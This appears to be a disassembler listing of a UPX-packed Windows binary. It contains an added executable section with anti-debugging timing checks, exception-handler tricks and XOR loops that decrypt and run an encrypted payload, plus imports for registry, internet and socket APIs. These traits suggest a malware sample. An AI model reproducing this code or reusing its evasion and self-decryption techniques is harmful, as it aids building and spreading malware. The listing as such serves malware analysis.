1BBC4ABh dd 6488F6E8h, 6572463Fh, 0DF50C65h, 0FC01B8A5h, 4D746547h dd 4665876Fh, 97F0066Bh, 6D614EE2h, 736C0168h, 95637274h dd 0BBDEE05Bh, 706F430Ah, 9D0A1979h, 291F1445h, 326578DCh dd 6F6F544Ah, 0FDA2936Ch, 337063BFh, 616E5332h, 6F687370h dd 2B9C1974h, 126B7745h, 0F737232h, 3E358F54h, 2C5CC160h dd 654E2118h, 87887478h, 6169C16Dh, 76455441h, 57FF6DBDh dd 69616B0Bh, 726F4674h, 7B673C53h, 0B06A624Fh, 76AE8856h dd 22DD442Ch, 6E6FEF8Dh, 0B6972F6h, 6573C83Ah, 646E6148h dd 25EDB00Ch, 5E24477Bh, 6DD26E08h, 61EF7084h, 4493F05Ah dd 6CEDB7A3h, 79645673h, 61984C14h, 866E492Bh, 66DD6ED8h dd 9530F6Fh, 49067065h, 0E02CD998h, 656B260Dh, 0B3284564h dd 36623364h, 0E0CC366Eh, 0B9FEC447h, 64410B12h, 70F7264h dd 7DECD836h, 7262694Ch, 2BB56761h, 0B2C2824Dh, 137CB9A2h dd 9ED08ED5h, 63CF02CDh, 0B6816954h, 88B6B0E2h, 4DDE6575h dd 66CD78E9h, 0CE341245h, 0F684590Dh, 39C45D86h, 0ACD8624Fh dd 455A843Ch, 0B8DF3178h, 0A4B6DB1h, 2D6D1363h, 85D91B52h dd 7B5926E7h, 657A8608h, 38216D38h, 154CA7B0h, 0CDDFC45h dd 60C368D8h, 673A2BD1h, 67E77390h, 79654BA1h, 0B0861045h dd 0C13B0ED6h, 0F60A510Fh, 0B0109B11h, 0E7309E97h, 61DEDD21h dd 51E01016h, 2962410Ch, 6EA1070Ah, 46853BEh, 8AF6612Dh dd 773B8643h, 0B05F6D36h, 0A108946h, 8E611244h, 0E98AEEDh dd 7966696Eh, 0DB8F67CAh, 75B586D0h, 0CE6C362Bh, 0DC2C796Fh dd 11D85BD9h, 8F52106Fh, 8D40E3Dh, 1DB4CC0Eh, 148FE436h dd 75716341h, 494D7269h, 2B9C1669h, 133AA035h, 0B473ECDEh dd 7273F0CDh, 0B26D06CAh, 5AE60E35h, 0F92862Ch, 1D1D4D53h dd 5F76856Eh, 5F3F5844h, 7311F668h, 27F502B1h, 982B0702h dd 7279B6CDh, 110E94Fh, 334D2291h, 1D294562h, 0D8B6527h dd 150E0073h, 41BB0A14h, 0B4E73098h, 73776649h, 856ED9A7h dd 66B10570h, 24F44F41h, 18A0D0F6h, 55855604h, 5B01489Bh dd 0E1141D8h, 0DC1A967h, 36B144Bh, 9963496Eh, 534386E1h dd 471A8174h, 2543AA3Bh, 73FFA10Dh, 6CB2CB2Ch, 10D0202h dd 2CB26F39h, 1734B2CBh, 9304090Ch, 13CB2CAAh, 0F9361610h dd 50D16AADh, 0DC960E45h, 40DD34h, 3FED9A00h, 10F00E0h dd 0C06010Bh, 83B11226h, 34DC472Ch, 31421023h, 0C966E90Bh dd 74A02A8h, 0EC0D600Ch, 341E2DCCh, 58840710h, 570692CEh dd 2B098C2Dh, 6420176Ch, 831E017Ch, 2E8C516Dh, 9024A26Ah dd 60241F26h, 49FC460h, 0F6642EE0h, 0E11ED90Dh, 2A0714FBh dd 0E850D227h, 48C01616h, 2F81h, 54C3F800h, 24000000h dd 0FF0000h, 2 dup(0) ; --------------------------------------------------------------------------- pusha mov esi, offset dword_31426000 lea edi, [esi-5000h] push edi or ebp, 0FFFFFFFFh jmp short loc_31427BD2 ; --------------------------------------------------------------------------- align 8 loc_31427BC8: ; CODE XREF: UPX1:loc_31427BD9j mov al, [esi] inc esi mov [edi], al inc edi loc_31427BCE: ; CODE XREF: UPX1:31427C66j ; UPX1:31427C7Dj add ebx, ebx jnz short loc_31427BD9 loc_31427BD2: ; CODE XREF: UPX1:31427BC0j mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427BD9: ; CODE XREF: UPX1:31427BD0j jb short loc_31427BC8 mov eax, 1 loc_31427BE0: ; CODE XREF: UPX1:31427BEFj ; UPX1:31427BFAj add ebx, ebx jnz short loc_31427BEB mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427BEB: ; CODE XREF: UPX1:31427BE2j adc eax, eax add ebx, ebx jnb short loc_31427BE0 jnz short loc_31427BFC mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx jnb short loc_31427BE0 loc_31427BFC: ; CODE XREF: UPX1:31427BF1j xor ecx, ecx sub eax, 3 jb short loc_31427C10 shl eax, 8 mov al, [esi] inc esi xor eax, 0FFFFFFFFh jz short loc_31427C82 mov ebp, eax loc_31427C10: ; CODE XREF: UPX1:31427C01j add ebx, ebx jnz short loc_31427C1B mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427C1B: ; CODE XREF: UPX1:31427C12j adc ecx, ecx add ebx, ebx jnz short loc_31427C28 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427C28: ; CODE XREF: UPX1:31427C1Fj adc ecx, ecx jnz short loc_31427C4C inc ecx loc_31427C2D: ; CODE XREF: UPX1:31427C3Cj ; UPX1:31427C47j add ebx, ebx jnz short loc_31427C38 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427C38: ; CODE XREF: UPX1:31427C2Fj adc ecx, ecx add ebx, ebx jnb short loc_31427C2D jnz short loc_31427C49 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx jnb short loc_31427C2D loc_31427C49: ; CODE XREF: UPX1:31427C3Ej add ecx, 2 loc_31427C4C: ; CODE XREF: UPX1:31427C2Aj cmp ebp, 0FFFFF300h adc ecx, 1 lea edx, [edi+ebp] cmp ebp, 0FFFFFFFCh jbe short loc_31427C6C loc_31427C5D: ; CODE XREF: UPX1:31427C64j mov al, [edx] inc edx mov [edi], al inc edi dec ecx jnz short loc_31427C5D jmp loc_31427BCE ; --------------------------------------------------------------------------- align 4 loc_31427C6C: ; CODE XREF: UPX1:31427C5Bj ; UPX1:31427C79j mov eax, [edx] add edx, 4 mov [edi], eax add edi, 4 sub ecx, 4 ja short loc_31427C6C add edi, ecx jmp loc_31427BCE ; --------------------------------------------------------------------------- loc_31427C82: ; CODE XREF: UPX1:31427C0Cj pop esi mov edi, esi mov ecx, 7Eh loc_31427C8A: ; CODE XREF: UPX1:31427C91j ; UPX1:31427C96j mov al, [edi] inc edi sub al, 0E8h loc_31427C8F: ; CODE XREF: UPX1:31427CB4j cmp al, 1 ja short loc_31427C8A cmp byte ptr [edi], 1 jnz short loc_31427C8A mov eax, [edi] mov bl, [edi+4] shr ax, 8 rol eax, 10h xchg al, ah sub eax, edi sub bl, 0E8h add eax, esi mov [edi], eax add edi, 5 mov eax, ebx loop loc_31427C8F lea edi, [esi+5000h] loc_31427CBC: ; CODE XREF: UPX1:31427CDEj mov eax, [edi] or eax, eax jz short loc_31427D07 mov ebx, [edi+4] lea eax, [eax+esi+7000h] add ebx, esi push eax add edi, 8 call dword ptr [esi+708Ch] xchg eax, ebp loc_31427CD9: ; CODE XREF: UPX1:31427CFFj mov al, [edi] inc edi or al, al jz short loc_31427CBC mov ecx, edi jns short near ptr loc_31427CEA+1 movzx eax, word ptr [edi] inc edi push eax inc edi loc_31427CEA: ; CODE XREF: UPX1:31427CE2j mov ecx, 0AEF24857h push ebp call dword ptr [esi+7090h] or eax, eax jz short loc_31427D01 mov [ebx], eax add ebx, 4 jmp short loc_31427CD9 ; --------------------------------------------------------------------------- loc_31427D01: ; CODE XREF: UPX1:31427CF8j call dword ptr [esi+7094h] loc_31427D07: ; CODE XREF: UPX1:31427CC0j popa jmp loc_31422334 ; --------------------------------------------------------------------------- align 400h UPX1 ends ; Section 3. (virtual address 00008000) ; Virtual size : 00002000 ( 8192.) ; Section size in file : 00002000 ( 8192.) ; Offset to raw data for section: 00008000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX2 segment para public 'CODE' use32 assume cs:UPX2 ;org 31428000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dd 3 dup(0) dd 80C4h, 808Ch, 3 dup(0) dd 80D1h, 809Ch, 3 dup(0) dd 80DEh, 80A4h, 3 dup(0) dd 80E9h, 80ACh, 3 dup(0) dd 80F4h, 80B4h, 3 dup(0) dd 8100h, 80BCh, 5 dup(0) dword_3142808C dd 77E805D8h ; DATA XREF: .gda_:3142A039r ; .gda_:3142A062r ... dd 77E7A5FDh, 77E75CB5h, 0 dd 77DD189Ah, 0 dd 77C3528Dh, 0 dd 77D4C96Ah, 0 dd 7620AFB6h, 0 dd 71AB1A6Dh, 0 dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h dd 6E65704Fh, 41h, 26h dup(0) dd 0C3906893h, 0C48BED01h, 0E85BD0FFh, 5Fh, 824648Bh, 4EBB8h dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 427500F8h dd 0E8h, 0ED815D00h, 402338h, 2385858Bh, 85030040h, 40238Dh dd 858BF08Bh, 402389h, 238D8503h, 60500040h, 0C933FE8Bh dd 2395958Ah, 32AC0040h, 0AAD002C2h, 918D3B41h, 7C004023h dd 2BC361F1h, 30FF64C0h, 0B8208964h, 12345678h, 60000387h dd 7BB00000h, 0 dd 1E003142h, 480000h, 75Ch dup(0) UPX2 ends ; Section 4. (virtual address 0000A000) ; Virtual size : 00028001 ( 163841.) ; Section size in file : 00028001 ( 163841.) ; Offset to raw data for section: 0000A000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute _gda_ segment para public 'CODE' use32 assume cs:_gda_ ;org 3142A000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing db 0 ; --------------------------------------------------------------------------- push ebp mov ebp, esp call loc_3142A013 call sub_3142A0B5 jmp near ptr byte_3142A068 ; --------------------------------------------------------------------------- loc_3142A013: ; CODE XREF: .gda_:3142A004p push dword ptr fs:0 mov ds:dword_3142A069, ebp mov fs:0, esp xor eax, eax push 80000000h push eax push eax push eax push 8000h push eax push eax push eax push eax push eax call ds:dword_3142808C ; LoadLibraryA xor ecx, ecx push ecx push ecx push ecx push ecx push 2 push 80000000h push 200h push ecx push ecx push 10h push 80000000h push ecx push ecx call ds:dword_3142808C ; LoadLibraryA ; --------------------------------------------------------------------------- byte_3142A068 db 0BDh ; CODE XREF: .gda_:3142A00Ej dword_3142A069 dd 12FFC0h ; DATA XREF: .gda_:3142A019w ; --------------------------------------------------------------------------- sub eax, eax loc_3142A06F: ; CODE XREF: .gda_:3142A075j dec al or al, al jz short loc_3142A079 jnz short loc_3142A06F jmp short loc_3142A0E0 ; --------------------------------------------------------------------------- loc_3142A079: ; CODE XREF: .gda_:3142A073j call $+5 pop edi add edi, 44h sub edx, edx xor edx, 2898h cld mov ebx, 0E2h push edi loc_3142A094: ; CODE XREF: .gda_:3142A0A3j xchg al, [edi] xor ax, bx mov [edi], al add edi, 1 sub edx, 1 or edx, edx jnz short loc_3142A094 pop edi mov ebx, [ebp-8] mov fs:0, ebx leave jmp edi ; --------------------------------------------------------------------------- db 3 dup(90h) ; =============== S U B R O U T I N E ======================================= sub_3142A0B5 proc near ; CODE XREF: .gda_:3142A009p arg_C = dword ptr 10h mov eax, [esp+arg_C] pop dword ptr [eax+0B8h] xor eax, eax retn sub_3142A0B5 endp ; sp-analysis failed ; --------------------------------------------------------------------------- dw 0E8h dd 8B000000h, 89FC2404h, 2FCB98h, 8680F700h, 28h, 8B800000h dd 7404245Ch ; --------------------------------------------------------------------------- loc_3142A0E0: ; CODE XREF: .gda_:3142A077j sub eax, 0CFB08959h das ; --------------------------------------------------------------------------- dw 0 ; --------------------------------------------------------------------------- push edi pop dword ptr [eax+2FD3h] cmp byte ptr [eax+288Ah], 0E8h jnz short loc_3142A105 add ebx, [eax+288Bh] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_3142A10D ; --------------------------------------------------------------------------- loc_3142A105: ; CODE XREF: .gda_:3142A0F6j mov ebx, [eax+288Ch] push dword ptr [ebx] loc_3142A10D: ; CODE XREF: .gda_:3142A103j pop ebx push ebp mov ebp, eax sub dword ptr [esp+4], 1EC7h sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+363898h] mov ecx, 0 rep movsb call sub_3142A183 mov ecx, eax call sub_3142A183 sub eax, ecx jz short loc_3142A157 cmp eax, 100h ja short loc_3142A157 lea eax, [ebp+3610D4h] mov dl, [eax-10h] call sub_3142A187 jmp short loc_3142A196 ; --------------------------------------------------------------------------- loc_3142A157: ; CODE XREF: .gda_:3142A13Ej ; .gda_:3142A145j test dword ptr [ebp+36388Bh], 80000000h jz short loc_3142A181 lea esi, [ebp+36388Fh] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FD4h] mov edi, [ebp+363FD8h] mov ebx, [ebp+363FD0h] loc_3142A181: ; CODE XREF: .gda_:3142A161j pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3142A183 proc near ; CODE XREF: .gda_:3142A130p ; .gda_:3142A137p rdtsc retn sub_3142A183 endp ; --------------------------------------------------------------------------- db 0C8h ; =============== S U B R O U T I N E ======================================= sub_3142A187 proc near ; CODE XREF: .gda_:3142A150p mov dh, dl mov ecx, 27B7h loc_3142A18E: ; CODE XREF: sub_3142A187+Cj xor [eax], dl inc eax add dl, dh loop loc_3142A18E retn sub_3142A187 endp ; --------------------------------------------------------------------------- loc_3142A196: ; CODE XREF: .gda_:3142A155j dec ecx jnb short loc_3142A1F1 rcl byte ptr [edi], 1 dec edi stc cmp eax, [esi-7Ch] lock or [ebx-7Ch], ebx mov al, 1 mov ds:68A0D910h, eax inc ebp pop ss dec ebx dec ebx push ebx pop ebx fmul st(6), st icebp add [eax-73h], dl in eax, 0B4h ; Interrupt Controller #2, 8259A stosd mov eax, 83937BC8h mov ds:0E862EBB8h, al mov ebx, 0DBBD1973h arpl [esi], cx mov cl, 80h retn 0FCh ; --------------------------------------------------------------------------- dd 829E96Dh, 0D1AB6F3Dh, 52ED543Ch, 13551992h, 7B0C6CB1h dd 1311A4CAh, 34DFAF2Bh, 4CF24BB6h db 1Bh ; --------------------------------------------------------------------------- loc_3142A1F1: ; CODE XREF: .gda_:3142A197j sbb esp, [ebx] inc esp mov edi, 54783B03h and al, ch mov al, 3Bh sub al, 67h mov ds:9E4928FDh, eax fsub st(4), st sub eax, 0BE5F8B10h mov ecx, 66B3EE7Dh sbb [eax], cl movsd jo short loc_3142A24D add [ebx-63BEC21Eh], cl aad 3Dh db 36h insd mov esi, 0A32821ECh inc edi push esi rcl dword ptr [ebp+305E9BEAh], 10h int 88h ; used by BASIC while in interpreter push eax sbb [edi+617404CDh], ah mov ebx, 9A521DE4h fisttp word ptr [edx] inc eax pop ebx das dec esi jmp near ptr 0E7C668F3h ; --------------------------------------------------------------------------- dw 0F848h dd 3068A31Bh db 7Dh ; --------------------------------------------------------------------------- loc_3142A24D: ; CODE XREF: .gda_:3142A213j add [edi+571F1BD4h], al ; --------------------------------------------------------------------------- db 8Fh dd 0A65DFF68h, 35E81663h, 518D4FB8h, 7028609Bh, 265DAD05h dd 241DA1D8h, 6F587507h, 0FD56E02Eh, 90FE1515h, 0A56CA5D7h dd 0D7E3404Eh, 0E5ACC51Bh, 9348808Eh, 67DD47Dh, 0F50BC0F8h dd 709EF560h, 0EC6D8338h, 0B0E8164Dh, 28D862Fh, 0F128568Ah dd 2B723531h, 85E5A0EEh, 50BED508h, 0CD25292Bh, 90FE3B7Eh dd 3B0000E9h, 8F08407Bh, 0CBAEF567h, 0F889808Eh, 0E4ECAFC7h dd 0DB88C0F8h, 30C2F45Fh, 90A0C33Bh, 39E02048h, 0E6337EFDh dd 9FD80898h, 102280B8h, 0BD63527h, 900DC0CEh, 72466417h dd 1D5F0038h, 86F820EDh, 69E7CB78h, 0F0286B64h, 486D39h dd 0A5E5A0EEh, 50BED2AAh, 925745EBh, 1BE8ECBBh, 83E04AA4h dd 458519B8h, 0F01E7BA1h, 0ECC32B4Bh, 0CE78F751h, 38DFDCBFh dd 70A9E01Bh, 0ABF695C7h, 746B206Eh, 0DFC8C558h, 0F02AFF1Ch dd 102217B8h, 3000A1B2h, 3808C0FCh, 70A9E018h, 0ABF695C7h dd 706D206Eh, 0D28AC477h, 0F0426098h, 1048E8E8h, 3002A0DCh dd 7842839h, 18F8E172h, 90C90039h, 8BD6B5A7h, 0DA60404Eh dd 0F286198h, 2673BE2Dh, 306D48D8h, 161C0F8h, 1AA8E01Ah dd 9A2B5938h, 25172A32h, 0D03E7BCAh, 73EB9173h, 2673DE05h dd 0B467A0D8h, 5088C2CCh, 70A8E6F0h, 0D49C4E38h, 4FE86C14h dd 0E6333AEDh, 3A9DED98h, 2348B6AFh, 0F6D52D11h, 0E188F6C3h dd 3407316h, 13C8003Ah, 86D3DAE5h, 54074078h, 0F0286298h dd 2B820533h, 4097A0EEh, 0B20D4FF9h, 0FBA8D62Fh, 0A6F3E2BDh dd 0B198DF58h, 0E827C5F7h, 75A360AEh, 107EBB76h, 0BF69D027h dd 66B0F67Dh, 0A2256B18h, 73C83603h, 0B199DF42h, 0E84BC5F7h dd 7DA360AEh, 107EBB62h, 4197A93Bh, 0D4FF9h, 98A8D620h dd 90C80180h, 8CB89DD5h, 1F83404Eh, 29DE60F2h, 934CF047h dd 7002A339h, 3ADF39FBh, 0FDB08A18h, 0A6DDD78Dh, 0B0F19958h dd 0D4854078h, 0FD79ED5h, 9DE3E647h, 3068EDDCh, 0FBEEC0F8h dd 0DBACA795h, 545E40Ah, 0B0DE1AA4h, 0D28126D4h, 32ABCBFEh dd 9BBD62BAh, 5868CA0Ch, 5088AF08h, 70C22C93h, 90A2C4B3h dd 0B0E82030h, 81482A70h, 0A0260ACAh, 2B9E1547h, 0B330A0EEh dd 0A0E0803Ch, 0FBA8E077h, 1BC86AECh, 0DAA84A94h, 820A2A78h dd 4060F2h, 7A4880D7h, 0CF02F1D8h, 8E1D3FA8h, 2FA8D623h dd 9F378561h, 0B0E927DCh, 0D0BDCD78h, 49285688h, 10488B44h dd 959B4F53h, 40882D79h, 0F525E02Eh, 90FE1400h, 0E4B8C0A7h dd 2F626012h, 0CBCEF567h, 0D0CD808Eh, 0D85CD587h, 5088C1B5h dd 70A8F1F0h, 0D4AD5338h, 0D79D423Dh, 0A6613228h, 974D0CF1h dd 0F81F80DDh, 3068A596h, 6FDC7507h, 0E557E02Eh, 90FE3B52h dd 9E7DDF0Fh, 0BA087643h, 0F2A0A98h, 2673DE2Dh, 314019D8h dd 7B1FC0F8h, 54A469F9h, 537576Ch, 0B0DE1BFAh, 758BB64Bh dd 0F01E5CA6h, 0EF1FD4B8h, 653064Dh, 244845F8h, 8E2BA67Eh dd 6F26723Ch, 0DAE0042Ch, 2F222A78h, 0C613FE0Dh, 648805B8h dd 0B6803304h, 6388C0FDh, 4A4B71D1h, 0ACF68501h, 829D206Eh dd 0F42C3CF9h, 835A13FBh, 0D1C9A8CCh, 3068AE4Ch, 6D894A8h dd 23F8B049h, 0AB9E95C7h, 706D206Eh, 2F073421h, 7F2044ECh dd 2674BE3Dh, 0CDAD48D8h, 0AFDB3F07h, 4693CE8Dh, 1146EB38h dd 0B0E9089Ch, 45F71778h, 0F01E5BB6h, 2B661547h, 5881A0EEh dd 50773F03h, 1AA88A42h, 0FAC86A38h, 0B0E94858h, 1483407Ch dd 9A7860F2h, 0EF8C0BB4h, 6F10F63Ah, 6388C0CCh, 8F7208D1h dd 545FFC7h, 0B0DE351Fh, 8059112Ah, 0CB1AF567h, 0D4CB808Eh dd 683063F8h, 7F78C0A0h, 7EF7E018h, 90C90038h, 0B0E82058h dd 0D0084078h, 0D8A36098h, 104880B8h, 6639A0D8h, 6A1D3FABh dd 0DBA8D623h, 504CAC61h, 5E0ADB2Dh, 0A19DCDBBh, 0A2285681h dd 2BDA1547h, 0B5E1A0EEh, 50BEFFACh, 70A8F6F0h, 0FFA74C38h dd 0E0985533h, 0B97E290Ah, 954F05F4h, 6524E1EEh, 6068E1BDh dd 6BB25507h, 0F521E02Eh, 90FE3F60h, 0D1AA7C9Bh, 0B146250Bh dd 0BF4C05F5h, 732DEADAh, 6634D3ACh, 33ED938Ch, 3C4E06Ch dd 0F5A4724Ch, 0C2AB2036h, 0B57C211Dh, 954409DEh, 620B80F9h dd 551CC1BDh, 35E4A9BEh, 0D88155h, 0D1AF6E51h, 0D59A6358h dd 806D3419h, 954B0FEAh, 1009F3CBh, 510DD29Bh, 35DAA58Ch dd 15DC8F75h, 0F5BA686Ch, 0F3E84439h, 0A469250Ah, 824034FDh dd 102CE1DDh, 510DD29Bh, 3FDCA58Ch, 15C08C77h, 0A2FB7054h dd 0C0894E0Bh, 0A467280Bh, 99502598h, 6220D4CCh, 300CC1BDh dd 35E4A9BEh, 15C5894Ch, 0E99B6F6Ch, 0DD8D542Bh, 0B565292Ch dd 955A2698h, 7221CCDDh, 491AC1AAh, 24ED87F8h, 15C4895Eh dd 0E2BC7479h, 0C49D4231h, 0D049331Dh, 0B65C05DFh, 432DECD1h dd 300DDAB1h, 16FCA5BFh, 24CD8C71h, 90AD6D51h, 0FD9C451Fh dd 0BC7D2417h, 9E4928FDh, 512DECDCh, 440DE7D8h, 20E5A5ACh dd 15C4895Eh, 0F5A56176h, 0D5AF2019h, 0BD6D140Ch, 844930E8h dd 5748C1D0h, 553ED4BDh, 3FE1B38Ah, 15EFE076h, 0E2AD564Ch dd 0DE87492Bh, 0D049383Dh, 0A65C05DFh, 7D3DECD7h, 5606E9BDh dd 31E5B297h, 1EC7896Ch, 0FF840079h, 0D9A44439h, 0A269321Ah dd 0BD2821E1h, 791EF0D9h, 5627D7BDh, 35E4A9BEh, 15D8AF18h dd 0FCA14656h, 0C0896D3Dh, 0B7662908h, 806760D9h, 6218EEDDh dd 430DC3B7h, 22D8C08Bh, 3CD8377h, 0D6FA334Bh, 0C49B5231h dd 0BF7A1078h, 835B05FBh, 7506B28Bh, 6368D4A0h, 39CEB49Dh dd 4E98574h, 0F2A1724Ch, 0C38D542Dh, 0B55B4039h, 9C4126ECh dd 7D21D4DDh, 5C3BA0BDh, 50F8A59Dh, 4DB994Bh, 0F99C6D5Dh dd 0DFBC4535h, 0B564293Eh, 954509CCh, 7D26D5B8h, 593ED0B9h dd 36C7B79Dh, 15C4895Eh, 0E2A15638h, 0DC89552Ch, 0BF642C39h dd 827F60FBh, 562DF4D1h, 300DCCB1h, 34C9B4B6h, 4DB9572h dd 0E6A17268h, 0D78D4C31h, 0BF5C331Dh, 0F04605F3h, 620BF4F6h dd 551CC1BDh, 35E4A9BEh, 33DCAE18h, 0E4A9654Ah, 0DF9A703Dh dd 0A37B251Bh, 0B35C2E98h, 6429E5CAh, 5F1AF0BDh, 23FBA59Bh dd 3EA8985Dh, 0F5BA434Ch, 0E38D5439h, 0B97C231Dh, 0BE280EF7h dd 753AC3CCh, 650DD4B9h, 0FAA58Bh, 15CB8F6Ah, 0DEC8734Bh dd 0C0896D2Ch, 0A76D292Eh, 957B06D7h, 7F21F4DBh, 4426A0B6h dd 3EEDB0B7h, 15C4895Eh, 0DFBC4E38h, 0E0864528h, 0B56B2F0Ah dd 9F7C13EBh, 1026E5D3h, 4027D496h, 35DBAE9Dh, 1FC1947Bh dd 0E4860056h, 0C4875208h, 867C231Dh, 855C12F1h, 7505ECD9h dd 491ACFB5h, 1FC8EF8h, 9DA856Dh, 0FFAE6E71h, 0C4894D2Ah dd 84662F11h, 9E4D0BF7h, 473CCEB8h, 551CC9AAh, 24FAA9AEh dd 3DC4816Dh, 0E2A76D5Dh, 0C4BA2021h, 0B9661514h, 954C0FFBh dd 793AF4EBh, 5F3CC7B6h, 39FBAEB9h, 19DA944Bh, 0C7C86756h dd 0C4BB610Bh, 0A57C3219h, 9C4B60E8h, 632DF3D7h, 5503C3B7h dd 3FEBC08Ch, 13CD8E76h, 0F5AF004Ch, 0C387482Ch, 0BE71220Ch dd 0F04D0DF9h, 662BE5CAh, 5E0DD3D8h, 3FFBC09Ch, 4CD8B7Bh dd 0E4A64938h, 0D586523Dh, 0BF64030Ch, 916005EBh, 7524E4D6h dd 4406E9D8h, 35E6B29Dh, 4CDA76Ch, 0FEA66F7Bh, 0D59C433Dh dd 0B17C131Ch, 0B92805ECh, 622DF4D6h, 7F1CC5B6h, 11E6A588h dd 4C6A918h, 0F5A6725Dh, 0D5986F2Ch, 0BC7A1516h, 9E6160D9h dd 7E3AE5CCh, 553AD4BDh, 39CEA499h, 31A88574h, 0C089567Ch dd 9EDA1311h, 0D0440C3Ch, 0B34F05CAh, 753BEFD4h, 3011C593h dd 1FEFA5AAh, 3BC68568h dd 0E88D795Dh, 0D5BA2019h, 0B57D111Fh, 917E19EAh, 552DF5D4h dd 6268E1A0h, 35DBA79Dh, 1CC9B66Ch, 0E88D654Dh, 83BE2019h dd 860A2A8Eh, 9AFCEBCEh, 62B7D2B9h, 0A597F6C0h, 50BEFFA0h dd 26FE2493h, 6F9E506Eh, 25173828h, 0D03E7BBEh, 0AE38A41Bh dd 9D48887Ah, 0F8435B91h, 5088A8A9h, 3C250818h, 90A2031Ch dd 0E0B92532h, 5B0D2A2Bh, 24A33054h, 5022D4E8h, 0CF3BF289h dd 66B32E6Dh, 7C6C6318h, 0AB3E95C7h, 746B206Eh, 45858370h dd 0F01E5A64h, 1022498Bh, 3058C88Ah, 9403C0CAh, 30C2B149h dd 88A25168h, 0E4E0E0DBh, 2F584E12h, 0C6138A0Dh, 308C03B8h dd 0F0ED72EBh, 0A74A59F7h, 0B28BB8C2h, 6FFB57FBh, 4F17E1B0h dd 758C4F87h, 0A0286098h, 102770D0h, 5ABC2BD8h, 3A444BF8h dd 70A88858h, 92A20028h, 0D8E84A0Ah, 0D0082F88h, 0A37960F2h dd 0CEDD7FE8h, 6F6896E3h, 7E1D3FA1h, 0F5A8D623h, 1BB974C7h dd 86FD5CD5h, 5D04A378h, 0C638600Dh, 479983B8h, 0BBBA5F8Bh dd 66B30A7Dh, 91276D18h, 78C8001Fh, 4F17DF73h, 0EBEAC5F3h dd 7FA560AEh, 1048A896h, 0CF97BA30h, 9E0D4B07h, 0FDA8D623h dd 90E035B7h, 4FE1C858h, 5583BF87h, 0F01E5B4Ah, 303C403Dh dd 182A2F55h, 0A460C0F8h, 0FB571FE6h, 0A6F3DABDh, 0C428A558h dd 9F87CD73h, 182860B0h, 0EFB77E67h, 0F3376753h, 508828ADh dd 0F1F5E018h, 0A6D310D5h, 3D211358h, 0E616D4FDh, 0A17C3198h dd 4119D0E9h, 0B323527h, 540FC0CEh, 5E3D1F3Ch, 0CDC83603h dd 0E5E8249Ah, 0D0084090h, 1DA93D98h, 107E9B87h, 0A5E55FB2h dd 50BEDBF2h, 5065B248h, 90E2001Ch, 0D6E4E4DBh, 0CB58C5BFh dd 0D0E560AEh, 0B1A057Fh, 304CA0EEh, 93D5C0D2h, 98F0FA72h dd 90C80031h, 1A8962D5h, 207D8986h, 0B8BD095Bh, 1548B684h dd 7260A85Ch, 6CC05571h, 925FE02Eh, 902055FBh, 0EDE82058h dd 0CB91ADF9h, 6DA360AEh, 107EBCF4h, 384CDC5Bh, 0E90CCFF8h dd 0F1A8E018h, 90CA08D4h, 0B4807458h, 2F084079h, 0C613E20Dh dd 9DB40BB8h, 316C845Ch, 3AD8C0F8h, 70AC0818h, 0C29E0038h dd 4FBF200Ah, 0E6333EEDh, 7DE15398h, 1049842Fh, 5A39F1D8h dd 51E291FAh, 70A8E070h, 5375278h, 0B0DE1B12h, 0A4FEC5EEh dd 987C30C3h, 104881BCh, 14DC5F8Fh, 5088C2D8h, 4C8275E7h dd 1591000Eh, 53FE5498h, 483106Ch, 0A17A60F2h, 85B7D6EFh dd 305E9B1Ah, 254845A1h, 0E557B6C8h, 90FE3B16h, 0E2AC77D5h dd 884C2A2Fh, 0F12CF715h, 23E380B8h, 6978CA18h, 0D86B0Bh dd 20F8B048h, 5375268h, 0B0DE1B0Ah, 0D20084F9h, 84D76098h dd 85B7889Ch, 305E9CC2h, 4A1D3FABh, 2DA8D624h, 10C804FAh dd 0B19D2A66h, 0A885CB3Eh, 1328568Dh, 10DD0DA1h, 336896C8h dd 82779629h, 0F8A7209Ch, 90C80127h, 0B1F8A457h, 0EE884078h dd 0B63815A2h, 1F48BE38h, 3069A15Ch, 70B640F8h, 0F1EE116Dh dd 0DE815006h, 3BAA551Fh, 0D14E86B7h, 0A1E64BD7h, 461980D2h dd 22FD5F8Bh, 988F6C4h, 0F5A72123h, 90C800E7h, 0AE60A5D5h dd 0D062404Eh, 0F0286CF0h, 0EF1BD0B8h, 654B24Dh, 5084FDF8h dd 0F5A7E018h, 90C80087h, 0B0E891B1h, 8036C178h, 0FF7E29CAh dd 1048253Dh, 38AE23D8h, 5F85FC54h, 70A8799Ch, 0E5E83C38h dd 8AD48CABh, 0D084C577h, 0FD856098h, 3068A098h, 550F81E5h dd 0FCF7B58Ch, 0CDDC024h, 0B0377EB9h, 0C59C5430h, 0D376C109h dd 0DF075AE8h, 578EE8CDh, 167A027h, 50AFD042h, 